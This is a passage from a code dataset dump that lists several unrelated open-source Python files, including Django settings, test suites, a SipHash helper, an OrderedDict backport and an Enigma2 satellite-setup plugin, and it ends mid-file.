repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
---|---|---|---|---|
calculuscowboy/cookiecutter-django | refs/heads/master | {{cookiecutter.project_slug}}/config/settings/local.py | 2 | # -*- coding: utf-8 -*-
"""
Local settings
- Run in Debug mode
{% if cookiecutter.use_mailhog == 'y' and cookiecutter.use_docker == 'y' %}
- Use mailhog for emails
{% else %}
- Use console backend for emails
{% endif %}
- Add Django Debug Toolbar
- Add django-extensions as app
"""
import socket
import os
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', default=True)
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env('DJANGO_SECRET_KEY', default='CHANGEME!!!')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_PORT = 1025
{% if cookiecutter.use_mailhog == 'y' and cookiecutter.use_docker == 'y' %}
EMAIL_HOST = env("EMAIL_HOST", default='mailhog')
{% else %}
EMAIL_HOST = 'localhost'
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND',
default='django.core.mail.backends.console.EmailBackend')
{% endif %}
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar', )
INTERNAL_IPS = ['127.0.0.1', '10.0.2.2', ]
# tricks to have debug toolbar when developing with docker
if os.environ.get('USE_DOCKER') == 'yes':
ip = socket.gethostbyname(socket.gethostname())
INTERNAL_IPS += [ip[:-1] + "1"]
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions', )
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
{% if cookiecutter.use_celery == 'y' %}
########## CELERY
# In development, all tasks will be executed locally by blocking until the task returns
CELERY_ALWAYS_EAGER = True
########## END CELERY
{% endif %}
# Your local stuff: Below this line define 3rd party library settings
# ------------------------------------------------------------------------------
|
ray306/expy | refs/heads/master | test/show_text.py | 1 | # coding:utf-8
##### package test #####
import sys
sys.path = ['../../']+sys.path
################
from expy import * # Import the needed functions
start() # Initiate the experiment environment
'''General usage'''
# Draw text on the canvas
drawText('Hello world!')
show(2) # Display current canvas
''''''
# Draw text on the canvas
w, h = drawText('Hello world!', show_now=False)
drawRect(w, h, color=C_red, fill=False, show_now=False)
show(2) # Display current canvas
# Draw text on the canvas, with left center's position
drawText('Hello! world!', anchor_x='left', anchor_y='bottom')
show(2) # Display current canvas
# Draw text on the canvas, with given fontsize
drawText('Hello world!', size=50)
show(2) # Display current canvas
# Draw text on the canvas, with given font color
drawText('Hello world!', color=C_red)
show(2) # Display current canvas
# # Draw text on the canvas, with given angle
# drawText('Hello world!', rotation=45)
# show(2) # Display current canvas
# Draw text on the canvas, with center's position
drawText('Hello! world!', x=-0.5, y=0.0)
show(2) # Display current canvas
drawText('Hello\nworld\n!') # Draw multi-line text on the canvas
show(2) # Display current canvas
# Display text on a new slide, it's functionally equals to clear+drawText+show,
textSlide('Hello\nworld\nagain!')
|
Sjors/bitcoin | refs/heads/master | test/functional/test_framework/siphash.py | 91 | #!/usr/bin/env python3
# Copyright (c) 2016-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Specialized SipHash-2-4 implementations.
This implements SipHash-2-4 for 256-bit integers.
"""
def rotl64(n, b):
return n >> (64 - b) | (n & ((1 << (64 - b)) - 1)) << b
def siphash_round(v0, v1, v2, v3):
v0 = (v0 + v1) & ((1 << 64) - 1)
v1 = rotl64(v1, 13)
v1 ^= v0
v0 = rotl64(v0, 32)
v2 = (v2 + v3) & ((1 << 64) - 1)
v3 = rotl64(v3, 16)
v3 ^= v2
v0 = (v0 + v3) & ((1 << 64) - 1)
v3 = rotl64(v3, 21)
v3 ^= v0
v2 = (v2 + v1) & ((1 << 64) - 1)
v1 = rotl64(v1, 17)
v1 ^= v2
v2 = rotl64(v2, 32)
return (v0, v1, v2, v3)
def siphash256(k0, k1, h):
n0 = h & ((1 << 64) - 1)
n1 = (h >> 64) & ((1 << 64) - 1)
n2 = (h >> 128) & ((1 << 64) - 1)
n3 = (h >> 192) & ((1 << 64) - 1)
v0 = 0x736f6d6570736575 ^ k0
v1 = 0x646f72616e646f6d ^ k1
v2 = 0x6c7967656e657261 ^ k0
v3 = 0x7465646279746573 ^ k1 ^ n0
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0 ^= n0
v3 ^= n1
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0 ^= n1
v3 ^= n2
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0 ^= n2
v3 ^= n3
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0 ^= n3
v3 ^= 0x2000000000000000
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0 ^= 0x2000000000000000
v2 ^= 0xFF
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
return v0 ^ v1 ^ v2 ^ v3
|
ds-hwang/chromium-crosswalk | refs/heads/master | third_party/pycoverage/coverage/__init__.py | 208 | """Code coverage measurement for Python.
Ned Batchelder
http://nedbatchelder.com/code/coverage
"""
from coverage.version import __version__, __url__
from coverage.control import coverage, process_startup
from coverage.data import CoverageData
from coverage.cmdline import main, CoverageScript
from coverage.misc import CoverageException
# Module-level functions. The original API to this module was based on
# functions defined directly in the module, with a singleton of the coverage()
# class. That design hampered programmability, so the current api uses
# explicitly-created coverage objects. But for backward compatibility, here we
# define the top-level functions to create the singleton when they are first
# called.
# Singleton object for use with module-level functions. The singleton is
# created as needed when one of the module-level functions is called.
_the_coverage = None
def _singleton_method(name):
"""Return a function to the `name` method on a singleton `coverage` object.
The singleton object is created the first time one of these functions is
called.
"""
# Disable pylint msg W0612, because a bunch of variables look unused, but
# they're accessed via locals().
# pylint: disable=W0612
def wrapper(*args, **kwargs):
"""Singleton wrapper around a coverage method."""
global _the_coverage
if not _the_coverage:
_the_coverage = coverage(auto_data=True)
return getattr(_the_coverage, name)(*args, **kwargs)
import inspect
meth = getattr(coverage, name)
args, varargs, kw, defaults = inspect.getargspec(meth)
argspec = inspect.formatargspec(args[1:], varargs, kw, defaults)
docstring = meth.__doc__
wrapper.__doc__ = ("""\
A first-use-singleton wrapper around coverage.%(name)s.
This wrapper is provided for backward compatibility with legacy code.
New code should use coverage.%(name)s directly.
%(name)s%(argspec)s:
%(docstring)s
""" % locals()
)
return wrapper
# Define the module-level functions.
use_cache = _singleton_method('use_cache')
start = _singleton_method('start')
stop = _singleton_method('stop')
erase = _singleton_method('erase')
exclude = _singleton_method('exclude')
analysis = _singleton_method('analysis')
analysis2 = _singleton_method('analysis2')
report = _singleton_method('report')
annotate = _singleton_method('annotate')
# On Windows, we encode and decode deep enough that something goes wrong and
# the encodings.utf_8 module is loaded and then unloaded, I don't know why.
# Adding a reference here prevents it from being unloaded. Yuk.
import encodings.utf_8
# Because of the "from coverage.control import fooey" lines at the top of the
# file, there's an entry for coverage.coverage in sys.modules, mapped to None.
# This makes some inspection tools (like pydoc) unable to find the class
# coverage.coverage. So remove that entry.
import sys
try:
del sys.modules['coverage.coverage']
except KeyError:
pass
# COPYRIGHT AND LICENSE
#
# Copyright 2001 Gareth Rees. All rights reserved.
# Copyright 2004-2013 Ned Batchelder. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDERS AND CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
|
signed/intellij-community | refs/heads/master | python/testData/copyPaste/IndentTabIncrease.src.py | 75 | <selection>print "Line 2"
</selection><caret>
class Test:
def __init__(self):
print "Line 1"
|
chintak/scikit-image | refs/heads/placeholder | skimage/io/tests/test_colormixer.py | 40 | from numpy.testing import (assert_array_equal,
assert_almost_equal,
assert_equal,
assert_array_almost_equal,
)
import numpy as np
import skimage.io._plugins._colormixer as cm
class ColorMixerTest(object):
def setup(self):
self.state = np.ones((18, 33, 3), dtype=np.uint8) * 200
self.img = np.zeros_like(self.state)
def test_basic(self):
self.op(self.img, self.state, 0, self.positive)
assert_array_equal(self.img[..., 0],
self.py_op(self.state[..., 0], self.positive))
def test_clip(self):
self.op(self.img, self.state, 0, self.positive_clip)
assert_array_equal(self.img[..., 0],
np.ones_like(self.img[..., 0]) * 255)
def test_negative(self):
self.op(self.img, self.state, 0, self.negative)
assert_array_equal(self.img[..., 0],
self.py_op(self.state[..., 0], self.negative))
def test_negative_clip(self):
self.op(self.img, self.state, 0, self.negative_clip)
assert_array_equal(self.img[..., 0],
np.zeros_like(self.img[..., 0]))
class TestColorMixerAdd(ColorMixerTest):
op = cm.add
py_op = np.add
positive = 50
positive_clip = 56
negative = -50
negative_clip = -220
class TestColorMixerMul(ColorMixerTest):
op = cm.multiply
py_op = np.multiply
positive = 1.2
positive_clip = 2
negative = 0.5
negative_clip = -0.5
class TestColorMixerBright(object):
def setup(self):
self.state = np.ones((18, 33, 3), dtype=np.uint8) * 200
self.img = np.zeros_like(self.state)
def test_brightness_pos(self):
cm.brightness(self.img, self.state, 1.25, 1)
assert_array_equal(self.img, np.ones_like(self.img) * 251)
def test_brightness_neg(self):
cm.brightness(self.img, self.state, 0.5, -50)
assert_array_equal(self.img, np.ones_like(self.img) * 50)
def test_brightness_pos_clip(self):
cm.brightness(self.img, self.state, 2, 0)
assert_array_equal(self.img, np.ones_like(self.img) * 255)
def test_brightness_neg_clip(self):
cm.brightness(self.img, self.state, 0, 0)
assert_array_equal(self.img, np.zeros_like(self.img))
class TestColorMixer(object):
def setup(self):
self.state = np.ones((18, 33, 3), dtype=np.uint8) * 50
self.img = np.zeros_like(self.state)
def test_sigmoid(self):
import math
alpha = 1.5
beta = 1.5
c1 = 1 / (1 + math.exp(beta))
c2 = 1 / (1 + math.exp(beta - alpha)) - c1
state = self.state / 255.
cm.sigmoid_gamma(self.img, self.state, alpha, beta)
img = 1 / (1 + np.exp(beta - state * alpha))
img = np.asarray((img - c1) / c2 * 255, dtype='uint8')
assert_almost_equal(img, self.img)
def test_gamma(self):
gamma = 1.5
cm.gamma(self.img, self.state, gamma)
img = np.asarray(((self.state / 255.)**(1 / gamma)) * 255,
dtype='uint8')
assert_array_almost_equal(img, self.img)
def test_rgb_2_hsv(self):
r = 255
g = 0
b = 0
h, s, v = cm.py_rgb_2_hsv(r, g, b)
assert_almost_equal(np.array([h]), np.array([0]))
assert_almost_equal(np.array([s]), np.array([1]))
assert_almost_equal(np.array([v]), np.array([1]))
def test_hsv_2_rgb(self):
h = 0
s = 1
v = 1
r, g, b = cm.py_hsv_2_rgb(h, s, v)
assert_almost_equal(np.array([r]), np.array([255]))
assert_almost_equal(np.array([g]), np.array([0]))
assert_almost_equal(np.array([b]), np.array([0]))
def test_hsv_add(self):
cm.hsv_add(self.img, self.state, 360, 0, 0)
assert_almost_equal(self.img, self.state)
def test_hsv_add_clip_neg(self):
cm.hsv_add(self.img, self.state, 0, 0, -1)
assert_equal(self.img, np.zeros_like(self.state))
def test_hsv_add_clip_pos(self):
cm.hsv_add(self.img, self.state, 0, 0, 1)
assert_equal(self.img, np.ones_like(self.state) * 255)
def test_hsv_mul(self):
cm.hsv_multiply(self.img, self.state, 360, 1, 1)
assert_almost_equal(self.img, self.state)
def test_hsv_mul_clip_neg(self):
cm.hsv_multiply(self.img, self.state, 0, 0, 0)
assert_equal(self.img, np.zeros_like(self.state))
if __name__ == "__main__":
from numpy.testing import run_module_suite
run_module_suite()
|
gracehyemin/is210-week-04-warmup | refs/heads/master | tests/test_task_04.py | 28 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests Task 04."""
# Import Python libs
import unittest
import task_04
class Task04TestCase(unittest.TestCase):
"""Test cases for Task 04."""
testmap = {
'not_enough_litterboxes': [2, 1, True, True],
'plenty_of_litterboxes': [1, 2, True, False],
'no_catfood': [1, 2, False, True],
'same_litterboxes': [1, 1, True, False],
}
def test_positional_args(self):
"""
Tests that too_many_kittens has the correct positional arguments.
"""
for case, params in self.testmap.iteritems():
result = task_04.too_many_kittens(*params[:3])
msg = 'Tried {} kittens, {} litterboxes and {} food, expected {}'
msg = msg.format(*params)
self.assertIs(result, params[3], msg)
def test_keyword_args(self):
"""
Tests that too_many_kittens has the correct keyword arguments.
"""
for case, params in self.testmap.iteritems():
result = task_04.too_many_kittens(kittens=params[0],
litterboxes=params[1],
catfood=params[2])
msg = 'Tried {} kittens, {} litterboxes, and {} food, expected {}'
msg = msg.format(*params)
self.assertIs(result, params[3], msg)
if __name__ == '__main__':
unittest.main()
|
flotre/Sick-Beard | refs/heads/development | lib/requests/packages/urllib3/packages/ordered_dict.py | 1093 | # Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
# Copyright 2009 Raymond Hettinger, released under the MIT License.
# http://code.activestate.com/recipes/576693/
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
|
Serg09/socorro | refs/heads/master | socorro/unittest/external/postgresql/test_skiplist.py | 11 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from nose.plugins.attrib import attr
from nose.tools import eq_, ok_, assert_raises
from socorro.external import MissingArgumentError, DatabaseError
from socorro.external.postgresql.skiplist import SkipList
from unittestbase import PostgreSQLTestCase
#==============================================================================
@attr(integration='postgres') # for nosetests
class IntegrationTestSkipList(PostgreSQLTestCase):
"""Test socorro.external.postgresql.crashes.Crashes class. """
#--------------------------------------------------------------------------
def setUp(self):
"""Set up this test class by populating the reports table with fake
data. """
super(IntegrationTestSkipList, self).setUp()
cursor = self.connection.cursor()
cursor.execute("""
TRUNCATE skiplist
CASCADE
""")
cursor.execute("""
INSERT INTO skiplist (category, rule)
VALUES
('prefix', 'arena_.*'),
('prefix', 'CrashInJS'),
('irrelevant', 'ashmem'),
('irrelevant', 'CxThrowException'),
('line_number', 'signatures_with_line_numbers_re')
;
""")
self.connection.commit()
cursor.close()
#--------------------------------------------------------------------------
def tearDown(self):
"""Clean up the database, delete tables and functions. """
cursor = self.connection.cursor()
cursor.execute("""
TRUNCATE skiplist
CASCADE
""")
self.connection.commit()
cursor.close()
super(IntegrationTestSkipList, self).tearDown()
#--------------------------------------------------------------------------
def test_get(self):
skiplist = SkipList(config=self.config)
params = {
}
res_expected = {
"hits": [
# Note: sort is case-insensitive
{
"category": "irrelevant",
"rule": "ashmem",
},
{
"category": "irrelevant",
"rule": "CxThrowException",
},
{
"category": "line_number",
"rule": "signatures_with_line_numbers_re",
},
{
"category": "prefix",
"rule": "arena_.*",
},
{
"category": "prefix",
"rule": "CrashInJS",
},
],
"total": 5
}
res = skiplist.get(**params)
eq_(res, res_expected)
def test_get_with_optional_filtering(self):
skiplist = SkipList(config=self.config)
# filter by category
params = {
'category': 'irrelevant'
}
res_expected = {
"hits": [
{
"category": "irrelevant",
"rule": "ashmem",
},
{
"category": "irrelevant",
"rule": "CxThrowException",
},
],
"total": 2
}
res = skiplist.get(**params)
eq_(res, res_expected)
# filter by rule
params = {
'rule': 'ashmem'
}
res_expected = {
"hits": [
{
"category": "irrelevant",
"rule": "ashmem",
},
],
"total": 1
}
res = skiplist.get(**params)
eq_(res, res_expected)
# filter by both
params = {
'category': 'irrelevant',
'rule': 'ashmem'
}
res_expected = {
"hits": [
{
"category": "irrelevant",
"rule": "ashmem",
},
],
"total": 1
}
res = skiplist.get(**params)
eq_(res, res_expected)
def test_post(self):
skiplist = SkipList(config=self.config)
assert_raises(MissingArgumentError, skiplist.post)
assert_raises(
MissingArgumentError,
skiplist.post,
category='something'
)
assert_raises(
MissingArgumentError,
skiplist.post,
rule='something'
)
# because of an integrity error since it already exists
assert_raises(
DatabaseError,
skiplist.post,
category='prefix', rule='CrashInJS'
)
ok_(
skiplist.post(category='suffix', rule='Erik*tiny*font')
)
cursor = self.connection.cursor()
cursor.execute("""
select * from skiplist where category=%s and rule=%s
""", ('suffix', 'Erik*tiny*font'))
first, = cursor.fetchall()
eq_(first[0], 'suffix')
eq_(first[1], 'Erik*tiny*font')
def test_delete(self):
skiplist = SkipList(config=self.config)
assert_raises(MissingArgumentError, skiplist.delete)
assert_raises(
MissingArgumentError,
skiplist.delete,
category='something'
)
assert_raises(
MissingArgumentError,
skiplist.delete,
rule='something'
)
cursor = self.connection.cursor()
cursor.execute("select count(*) from skiplist")
first, = cursor.fetchall()
count = first[0]
eq_(count, 5)
ok_(skiplist.delete(category='irrelevant', rule='ashmem'))
cursor.execute("select count(*) from skiplist")
first, = cursor.fetchall()
count = first[0]
eq_(count, 4)
cursor.execute("""
select count(*) from skiplist
where category=%s and rule=%s
""", ('irrelevant', 'ashmem'))
first, = cursor.fetchall()
count = first[0]
eq_(count, 0)
ok_(not skiplist.delete(category='neverheard', rule='of'))
|
thodoris/djangoPharma | refs/heads/master | djangoPharma/env/Lib/site-packages/django/contrib/flatpages/sitemaps.py | 729 | from django.apps import apps as django_apps
from django.contrib.sitemaps import Sitemap
from django.core.exceptions import ImproperlyConfigured
class FlatPageSitemap(Sitemap):
def items(self):
if not django_apps.is_installed('django.contrib.sites'):
raise ImproperlyConfigured("FlatPageSitemap requires django.contrib.sites, which isn't installed.")
Site = django_apps.get_model('sites.Site')
current_site = Site.objects.get_current()
return current_site.flatpage_set.filter(registration_required=False)
|
kingvuplus/ops | refs/heads/master | lib/python/Plugins/SystemPlugins/SatelliteEquipmentControl/plugin.py | 34 | from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Plugins.Plugin import PluginDescriptor
from Components.ConfigList import ConfigListScreen
from Components.ActionMap import ActionMap
from Components.config import config
from Components.NimManager import nimmanager as nimmgr
class SecParameterSetup(Screen, ConfigListScreen):
skin = """
<screen position="center,center" size="620,455" title="Satellite equipment setup" >
<widget name="config" position="10,10" size="600,450" />
</screen>"""
def __init__(self, session):
self.skin = SecParameterSetup.skin
self["actions"] = ActionMap(["SetupActions", "MenuActions"],
{
"ok": self.keySave,
"cancel": self.keyCancel,
"menu": self.setDefault,
}, -2)
Screen.__init__(self, session)
self.setTitle(_("Satellite equipment setup"))
list = [
(_("Delay after diseqc reset command"), config.sec.delay_after_diseqc_reset_cmd),
(_("Delay after diseqc peripherial poweron command"), config.sec.delay_after_diseqc_peripherial_poweron_cmd),
(_("Delay after continuous tone disable before diseqc"), config.sec.delay_after_continuous_tone_disable_before_diseqc),
(_("Delay after final continuous tone change"), config.sec.delay_after_final_continuous_tone_change),
(_("Delay after last voltage change"), config.sec.delay_after_final_voltage_change),
(_("Delay between diseqc commands"), config.sec.delay_between_diseqc_repeats),
(_("Delay after last diseqc command"), config.sec.delay_after_last_diseqc_command),
(_("Delay after toneburst"), config.sec.delay_after_toneburst),
(_("Delay after change voltage before switch command"), config.sec.delay_after_change_voltage_before_switch_command),
(_("Delay after enable voltage before switch command"), config.sec.delay_after_enable_voltage_before_switch_command),
(_("Delay between switch and motor command"), config.sec.delay_between_switch_and_motor_command),
(_("Delay after set voltage before measure motor power"), config.sec.delay_after_voltage_change_before_measure_idle_inputpower),
(_("Delay after enable voltage before motor command"), config.sec.delay_after_enable_voltage_before_motor_command),
(_("Delay after motor stop command"), config.sec.delay_after_motor_stop_command),
(_("Delay after voltage change before motor command"), config.sec.delay_after_voltage_change_before_motor_command),
(_("Delay before sequence repeat"), config.sec.delay_before_sequence_repeat),
(_("Motor running timeout"), config.sec.motor_running_timeout),
(_("Motor command retries"), config.sec.motor_command_retries) ]
ConfigListScreen.__init__(self, list)
def setDefault(self):
self.session.openWithCallback(self.setDefaultCallback, MessageBox, _("Set default settings?"), MessageBox.TYPE_YESNO)
def setDefaultCallback(self, answer):
if answer:
config.sec.delay_after_diseqc_reset_cmd.value = 50
config.sec.delay_after_diseqc_peripherial_poweron_cmd.value = 150
config.sec.delay_after_continuous_tone_disable_before_diseqc.value = 25
config.sec.delay_after_final_continuous_tone_change.value = 10
config.sec.delay_after_final_voltage_change.value = 10
config.sec.delay_between_diseqc_repeats.value = 120
config.sec.delay_after_last_diseqc_command.value = 50
config.sec.delay_after_toneburst.value = 50
config.sec.delay_after_change_voltage_before_switch_command.value = 20
config.sec.delay_after_enable_voltage_before_switch_command.value = 200
config.sec.delay_between_switch_and_motor_command.value = 700
config.sec.delay_after_voltage_change_before_measure_idle_inputpower.value = 500
config.sec.delay_after_enable_voltage_before_motor_command.value = 900
config.sec.delay_after_motor_stop_command.value = 500
config.sec.delay_after_voltage_change_before_motor_command.value = 500
config.sec.delay_before_sequence_repeat.value = 70
config.sec.motor_running_timeout.value = 360
config.sec.motor_command_retries.value = 1
config.sec.delay_after_diseqc_reset_cmd.save()
config.sec.delay_after_diseqc_peripherial_poweron_cmd.save()
config.sec.delay_after_continuous_tone_disable_before_diseqc.save()
config.sec.delay_after_final_continuous_tone_change.save()
config.sec.delay_after_final_voltage_change.save()
config.sec.delay_between_diseqc_repeats.save()
config.sec.delay_after_last_diseqc_command.save()
config.sec.delay_after_toneburst.save()
config.sec.delay_after_change_voltage_before_switch_command.save()
config.sec.delay_after_enable_voltage_before_switch_command.save()
config.sec.delay_between_switch_and_motor_command.save()
config.sec.delay_after_voltage_change_before_measure_idle_inputpower.save()
config.sec.delay_after_enable_voltage_before_motor_command.save()
config.sec.delay_after_motor_stop_command.save()
config.sec.delay_after_voltage_change_before_motor_command.save()
config.sec.delay_before_sequence_repeat.save()
config.sec.motor_running_timeout.save()
config.sec.motor_command_retries.save()
self.close(True)
session = None
def confirmed(answer):
global session
if answer:
session.open(SecParameterSetup)
def SecSetupMain(Session, **kwargs):
global session
session = Session
session.openWithCallback(confirmed, MessageBox, _("Please do not change any values unless you know what you are doing!"), MessageBox.TYPE_INFO)
def SecSetupStart(menuid):
show = False
